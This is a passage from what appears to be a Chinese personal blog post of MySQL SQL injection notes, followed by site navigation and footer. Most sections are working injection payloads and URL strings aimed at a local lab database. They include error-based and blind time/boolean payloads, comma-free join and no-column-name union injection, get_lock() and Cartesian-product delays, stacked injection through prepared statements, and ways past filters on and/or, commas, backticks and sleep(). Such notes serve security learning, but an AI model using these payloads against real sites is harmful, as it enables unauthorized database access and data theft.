<p>这种情况像这样查询找不到字段数，但是order by还能多个字段排序：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users order by 1,2</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/sql2.jpg" alt>   </p>
<p>这种排序的意思：在进行多个排序的时候是按照优先级来排序，优先按照前面的字段来排序，这里查询users表的时候先是按照第一个字段排序，如果有几条数据相同，再按照第二个字段进行排序  </p>
<p>然后我们就可以使用第一个位置来判断字段数，第二个用来闭合引号<br><img src="https://k-ring.github.io/img/sql3.jpg" alt>   </p>
<p>这样就能够判断字段数了。   </p>
<h3 id="过滤and-or-amp-字符"><a href="#过滤and-or-amp-字符" class="headerlink" title="过滤and/or/&amp;/|字符"></a>过滤and/or/&amp;/|字符</h3><p>在注入的时候，有时会存在过滤了<code>and、or、&amp;、|</code>这些词汇，通常我们在进行报错注入或者盲注的时候需要用到这些连接词来连接两条逻辑语句，如果过滤了这些，还有很多字符可以连接两条逻辑语句<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">+   -   *   ^</span><br><span class="line">/ 或者 div</span><br><span class="line">% 或者 mod</span><br><span class="line">=   &lt;&gt;   !=   &gt;   &lt;   &lt;=   &gt;=   in   &gt;&gt;   &lt;&lt;</span><br><span class="line">not in</span><br><span class="line">&lt;=&gt;</span><br><span class="line">like   rlike   regexp</span><br></pre></td></tr></table></figure></p>
<p>其中部分测试语句：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">报错注入：</span><br><span class="line">select * from users where id = &apos;1&apos; in (updatexml(1,concat(0x7e,version(),0x7e),1))</span><br><span class="line"></span><br><span class="line">select * from users where id = &apos;1&apos;/updatexml(1,concat(0x7e,version(),0x7e),1)/&apos;&apos;</span><br><span class="line">(其他闭合引号类似)</span><br><span class="line"></span><br><span class="line">时间盲注：</span><br><span class="line">select * from users where id = &apos;1&apos;mod(select*from(select(if(length(database())=4,sleep(1),1)))x)mod&apos;&apos;</span><br><span class="line"></span><br><span class="line">布尔盲注：</span><br><span class="line">select * from users where id = &apos;10&apos;mod(select*from(select(if(length(database())&gt;1,11,1)))x)mod&apos;11&apos;</span><br></pre></td></tr></table></figure></p>
<p>关于布尔盲注的返回值问题：<br><img src="https://k-ring.github.io/img/sql8.jpg" alt><br>首先位置1这里的参数要保证有正常页面出现，位置二这里值为多少无所谓，只要大于位置1的值就行，要保证取余过后值还是为原数，位置三也是一样，只有这样才能保证语句正确相应正常页面，语句错误相应异常页面。<br><img src="https://k-ring.github.io/img/sql9.jpg" alt>   </p>
<h3 id="过滤逗号的join注入"><a href="#过滤逗号的join注入" class="headerlink" title="过滤逗号的join注入"></a>过滤逗号的join注入</h3><p>在联合注入的时候，如果被过滤了逗号，会让我们的操作很受限，这时可以使用join连结多个表<br>例如：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from (select 1)a join (select 2)b join (select 3)c</span><br></pre></td></tr></table></figure></p>
<p>先是执行三个select形成单个字段的3张表，然后使用join将三张表连结起来，这样就形成了一个有三个字段的一张表，这样就可以绕过逗号过滤，形成多个字段的表<br><img src="https://k-ring.github.io/img/sql10.jpg" alt><br>注入就是在相应回显字段处注入即可   </p>
<p>使用limit限定条数：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mysql root@localhost:security&gt; select * from users limit 2 offset 1</span><br><span class="line">+----+----------+------------+</span><br><span class="line">| id | username | password   |</span><br><span class="line">+----+----------+------------+</span><br><span class="line">| 2  | Angelina | I-kill-you |</span><br><span class="line">| 3  | Dummy    | p@ssword   |</span><br><span class="line">+----+----------+------------+</span><br><span class="line">2 rows in set</span><br><span class="line">Time: 0.017s</span><br></pre></td></tr></table></figure></p>
<h3 id="高版本mysql数据库的innodb注入"><a href="#高版本mysql数据库的innodb注入" class="headerlink" title="高版本mysql数据库的innodb注入"></a>高版本mysql数据库的innodb注入</h3><p>在MySQL数据库中，存储数据的默认引擎有两种，在5.6.x过后，MySQL默认引擎换为了innodb，innodb增加了两个新表: <code>innodb_table_stats</code> 和 <code>innodb_index_stats</code>，在innodb_table_stats表中保存了数据库变动的记录，也就是可以看到新创建或者更改的数据库的表。  </p>
<p>也就是说在<code>information_schema</code>这个数据库名有被过滤的时候，可以在mysql数据库中的<code>innodb_table_stats</code>这个表中查找当前数据库表的信息。<br><img src="https://k-ring.github.io/img/sql11.jpg" alt>   </p>
<p>缺陷：使用这个方法有一些小缺陷，第一个就是只能查到表的信息，查不到字段；第二个就是需要数据库管理权限，因为mysql库是系统库，需要root权限。   </p>
<h3 id="不知道列名的无列名注入"><a href="#不知道列名的无列名注入" class="headerlink" title="不知道列名的无列名注入"></a>不知道列名的无列名注入</h3><p>有时在进行联合注入的时候只知道表名，查不到列名，上面的innodb就符合这样的情况，只能查到数据表，这时就需要无列名注入了：<br>先看一个小例子：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mysql root@localhost:security&gt; select 1,2,3 union select * from users;</span><br><span class="line">+----+----------+------------+</span><br><span class="line">| 1  | 2        | 3          |</span><br><span class="line">+----+----------+------------+</span><br><span class="line">| 1  | 2        | 3          |</span><br><span class="line">| 1  | Dumb     | Dumb       |</span><br><span class="line">| 2  | Angelina | I-kill-you |</span><br><span class="line">| 3  | Dummy    | p@ssword   |</span><br><span class="line">+----+----------+------------+</span><br></pre></td></tr></table></figure></p>
<p>这样会生成一个列名分别为1、2、3的表，然后再使用多表查询<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mysql root@localhost:security&gt; select `2` from (select 1,2,3 union select * from users)x</span><br><span class="line">+----------+</span><br><span class="line">| 2        |</span><br><span class="line">+----------+</span><br><span class="line">| 2        |</span><br><span class="line">| Dumb     |</span><br><span class="line">| Angelina |</span><br><span class="line">| Dummy    |</span><br><span class="line">+----------+</span><br></pre></td></tr></table></figure></p>
<p>这里用到了反引号，会把反引号里面的内容当做列名，然后查找该列名的所有内容<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users where id = 1 union select 1,`2`,3 from (select 1,2,3 union select * from users)x limit 2,1</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/sql12.jpg" alt>    </p>
<p>然后再结合过滤了逗号的情况下，联合join多表结合的方式注入：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select * from users where id = 1 union select * from (select 1)a join (select 2)b join (select 3)c</span><br><span class="line"></span><br><span class="line">select * from users where id = 1 union select * from (select 1)a join (select username from users)b join (select 3)c          #这个例子只是结合了过滤了逗号的情况，还是使用的列名查找数据</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/sql13.jpg" alt>    </p>
<p>然后再结合过滤了逗号的无列名注入：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * from users where id = 1 union select * from (select 1)a join (select `5` from (select * from (select 4)x join (select 5)y join (select 6)z union select * from users)d)b join (select 3)c limit 1 offset 0</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/sql14.jpg" alt>    </p>
<h4 id="反引号被过滤"><a href="#反引号被过滤" class="headerlink" title="反引号被过滤"></a>反引号被过滤</h4><p>其实这里不一定要使用反引号，也可以使用字符<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql root@localhost:security&gt; select a from (select 1,2 as a,3 union select * from users)x</span><br><span class="line">+----------+</span><br><span class="line">| a        |</span><br><span class="line">+----------+</span><br><span class="line">| 2        |</span><br><span class="line">| Dumb     |</span><br><span class="line">| Angelina |</span><br><span class="line">+----------+</span><br></pre></td></tr></table></figure></p>
<p>将有回显的字段取一个别名，就可以通过他的别名查找数据。    </p>
<p>也可以多了合并查询：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql root@localhost:security&gt; select concat(`1`,0x7e,0x7e,`3`) from (select 1,2 as a,3 union select * from users)x</span><br><span class="line">+---------------------------+</span><br><span class="line">| concat(`1`,0x7e,0x7e,`3`) |</span><br><span class="line">+---------------------------+</span><br><span class="line">| 1~~3                      |</span><br><span class="line">| 1~~Dumb                   |</span><br><span class="line">| 2~~I-kill-you             |</span><br><span class="line">+---------------------------+</span><br></pre></td></tr></table></figure></p>
<h3 id="get-lock-时间盲注和笛卡尔积时间盲注"><a href="#get-lock-时间盲注和笛卡尔积时间盲注" class="headerlink" title="get_lock()时间盲注和笛卡尔积时间盲注"></a>get_lock()时间盲注和笛卡尔积时间盲注</h3><p>通常时间盲注使用的函数是<code>sleep()</code>和<code>benchmark()</code>，如果这两个函数被过滤了，那么可以使用<code>get_lock()</code>函数和笛卡尔积方式进行盲注。   </p>
<h4 id="get-lock"><a href="#get-lock" class="headerlink" title="get_lock()"></a>get_lock()</h4><p>get_lock(key, time)函数的意思就是给一个key上锁，如果上锁失败，就等待time秒，然后回滚事务。   </p>
<p>使用这个函数进行时间盲注的操作步骤：   </p>
<blockquote>
<p>先使用get_lock(key, time)给一个key上锁，然后再使用get_lock(key,time)给相同的key上锁，这时候因为这个key已经被加锁了，第二次使用get_lock(key,ctiem)给同一个key加锁时就会等待ctime秒(等待时间是第二次加锁函数的时间)，这样就能判断出我们注入的SQL语句是否正确。   </p>
</blockquote>
<p>我先在命令行上演示：开两个命令行，一个上锁，另一个给同样的key加锁<br><img src="https://k-ring.github.io/img/sql4.jpg" alt><br><img src="https://k-ring.github.io/img/sql5.jpg" alt>   </p>
<p>在网站上进行注入的时候执行的语句满足上述的情况(相当于在不同的进程中执行语句)。   </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/index.php?id=1 and get_lock(1,2)</span><br><span class="line"></span><br><span class="line">http://127.0.0.1/index.php?id=1 and if(1, get_lock(1,5),1)</span><br></pre></td></tr></table></figure>
<p>在命令行的情况下，release_lock(key)表示释放key的锁，或者关闭命令行也可释放。  </p>
<h4 id="笛卡尔积盲注"><a href="#笛卡尔积盲注" class="headerlink" title="笛卡尔积盲注"></a>笛卡尔积盲注</h4><p>什么是笛卡尔积？</p>
<blockquote>
<p>笛卡尔乘积是指在数学中，两个集合X和Y的笛卡尔积（Cartesian product），又称直积，表示为X × Y，第一个对象是X的成员而第二个对象是Y的所有可能有序对的其中一个成员。假设集合A={a, b}，集合B={0, 1, 2}，则两个集合的笛卡尔积为{(a, 0), (a, 1), (a, 2), (b, 0), (b, 1), (b, 2)}</p>
</blockquote>
<p>mysql支持多表查询，笛卡尔积可以将多个表合并成一个表，在进行多表合并的时候，耗费的时间就比较长，造成延时的效果。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select count(*) from information_schema.columns A,information_schema.columns B,information_schema.columns C</span><br><span class="line"></span><br><span class="line">http://127.0.0.1/index.php?id=1 and if(1, (select count(*) from information_schema.columns A,information_schema.columns B,information_schema.columns C), 1)</span><br></pre></td></tr></table></figure></p>
<p>延时时间大概11s左右</p>
<h3 id="desc-和-describe-小trick"><a href="#desc-和-describe-小trick" class="headerlink" title="desc 和 describe 小trick"></a>desc 和 describe 小trick</h3><p>describe表示描述的意思，desc是缩写，这两个可以查看表的字段信息。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">desc &lt;table_name&gt;</span><br><span class="line">or</span><br><span class="line">describe &lt;table_name&gt;</span><br></pre></td></tr></table></figure></p>
<p>会输出表的字段信息。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; desc users;</span><br><span class="line">+----------+-------------+------+-----+---------+----------------+</span><br><span class="line">| Field    | Type        | Null | Key | Default | Extra          |</span><br><span class="line">+----------+-------------+------+-----+---------+----------------+</span><br><span class="line">| id       | int(3)      | NO   | PRI | NULL    | auto_increment |</span><br><span class="line">| username | varchar(20) | NO   |     | NULL    |                |</span><br><span class="line">| password | varchar(20) | NO   |     | NULL    |                |</span><br><span class="line">+----------+-------------+------+-----+---------+----------------+</span><br></pre></td></tr></table></figure></p>
<h3 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h3><p>在mysql中允许一条语句执行多条命令，每条命令使用分号(;)分隔开。  </p>
<p>SQL语句预编译：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">prepare stmt from &quot;select ? as test&quot;</span><br><span class="line"></span><br><span class="line">set @test=user()</span><br><span class="line"></span><br><span class="line">execute stmt using @test</span><br></pre></td></tr></table></figure></p>
<p>这些语句必须在一个进程里面实现。如果是在命令行的话，那就必须在一个命令行里执行；如果是在web站点上的话，那就必须满足堆叠注入，能一次性执行多条语句。<br><img src="https://k-ring.github.io/img/sql6.jpg" alt>   </p>
<p>在web站点上运用类似：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/index.php?id=1;prepare stmt from &quot;select ? as test&quot;;set @test=user();execute stmt using @test</span><br></pre></td></tr></table></figure></p>
<p>prepare预编译还有另外一种写法：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">set @s=&apos;select ?&apos;</span><br><span class="line"></span><br><span class="line">prepare stmt2 from @s</span><br><span class="line"></span><br><span class="line">set @t=user()</span><br><span class="line"></span><br><span class="line">execute stmt2 using @t</span><br></pre></td></tr></table></figure></p>
<p><img src="https://k-ring.github.io/img/sql7.jpg" alt>   </p>
<h4 id="参考MySQL中文文档"><a href="#参考MySQL中文文档" class="headerlink" title="参考MySQL中文文档"></a>参考MySQL中文文档</h4><p><a href="https://www.mysqlzh.com/doc/131.html" target="_blank" rel="noopener">用于预处理语句的SQL语法</a>   </p>
<h3 id="其他"><a href="#其他" class="headerlink" title="其他"></a>其他</h3><p>1)addslashes，mysql_real_escape_string，replace的转义作用可以通过宽字节注入（前提是数据库编码设置有问题）  </p>
<p>2)mysqli_multi_query()，执行多条SQL语句，存在堆叠注入。<br>mysqli_query()只可以执行一条SQL语句  </p>
<p>3)关于SQL注入bypass的好文章：<a href="https://www.secpulse.com/archives/53328.html" target="_blank" rel="noopener">我的WafBypass之路</a></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"># SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/18/多线程学习/" rel="next" title="多线程学习">
                <i class="fa fa-chevron-left"></i> 多线程学习
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/01/xpath注入/" rel="prev" title="Xpath注入学习">
                Xpath注入学习 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">故人梦</p>
              <p class="site-description motion-element" itemprop="description">人的一生应该这样度过:不因虚度年华而悔恨，也不因碌碌无为而羞愧</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">27</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">21</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#参数类型及其SQL语句中参数的修饰"><span class="nav-number">1.</span> <span class="nav-text">参数类型及其SQL语句中参数的修饰</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#时间盲注检测注入"><span class="nav-number">2.</span> <span class="nav-text">时间盲注检测注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#密码框的注入检测"><span class="nav-number">3.</span> <span class="nav-text">密码框的注入检测</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#insert、update、delete注入"><span class="nav-number">4.</span> <span class="nav-text">insert、update、delete注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#update、delete、insert注入判断"><span class="nav-number">5.</span> <span class="nav-text">update、delete、insert注入判断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#header头注入点"><span class="nav-number">6.</span> <span class="nav-text">header头注入点</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#二次注入的简单应用"><span class="nav-number">7.</span> <span class="nav-text">二次注入的简单应用</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过空格过滤"><span class="nav-number">8.</span> <span class="nav-text">绕过空格过滤</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#使用科学计数法可以忽略空格"><span class="nav-number">8.1.</span> <span class="nav-text">使用科学计数法可以忽略空格</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#空白字符"><span class="nav-number">8.2.</span> <span class="nav-text">空白字符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#加号-连接符"><span class="nav-number">8.3.</span> <span class="nav-text">加号(+)连接符</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#小数点-连接"><span class="nav-number">8.4.</span> <span class="nav-text">小数点(.)连接</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#圆括号"><span class="nav-number">8.5.</span> <span class="nav-text">圆括号(())</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#绕过星号-过滤"><span class="nav-number">9.</span> <span class="nav-text">绕过星号(*)过滤</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#过滤空格的SQL语句"><span class="nav-number">10.</span> <span class="nav-text">过滤空格的SQL语句</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MySQL常用的sql函数及关键字"><span class="nav-number">11.</span> <span class="nav-text">MySQL常用的sql函数及关键字</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#MySQL自定义变量"><span class="nav-number">12.</span> <span class="nav-text">MySQL自定义变量</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#union-select绕过"><span class="nav-number">13.</span> <span class="nav-text">union select绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sleep-简单用法"><span class="nav-number">14.</span> <span class="nav-text">sleep()简单用法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#过滤-和-注释符"><span class="nav-number">15.</span> <span class="nav-text">过滤--和#注释符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#过滤and-or-amp-字符"><span class="nav-number">16.</span> <span class="nav-text">过滤and/or/&amp;/|字符</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#过滤逗号的join注入"><span class="nav-number">17.</span> <span class="nav-text">过滤逗号的join注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#高版本mysql数据库的innodb注入"><span class="nav-number">18.</span> <span class="nav-text">高版本mysql数据库的innodb注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#不知道列名的无列名注入"><span class="nav-number">19.</span> <span class="nav-text">不知道列名的无列名注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#反引号被过滤"><span class="nav-number">19.1.</span> <span class="nav-text">反引号被过滤</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#get-lock-时间盲注和笛卡尔积时间盲注"><span class="nav-number">20.</span> <span class="nav-text">get_lock()时间盲注和笛卡尔积时间盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#get-lock"><span class="nav-number">20.1.</span> <span class="nav-text">get_lock()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#笛卡尔积盲注"><span class="nav-number">20.2.</span> <span class="nav-text">笛卡尔积盲注</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#desc-和-describe-小trick"><span class="nav-number">21.</span> <span class="nav-text">desc 和 describe 小trick</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#堆叠注入"><span class="nav-number">22.</span> <span class="nav-text">堆叠注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#参考MySQL中文文档"><span class="nav-number">22.1.</span> <span class="nav-text">参考MySQL中文文档</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#其他"><span class="nav-number">23.</span> <span class="nav-text">其他</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-snowflake-o"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">故人梦</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">48.5k</span>
  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
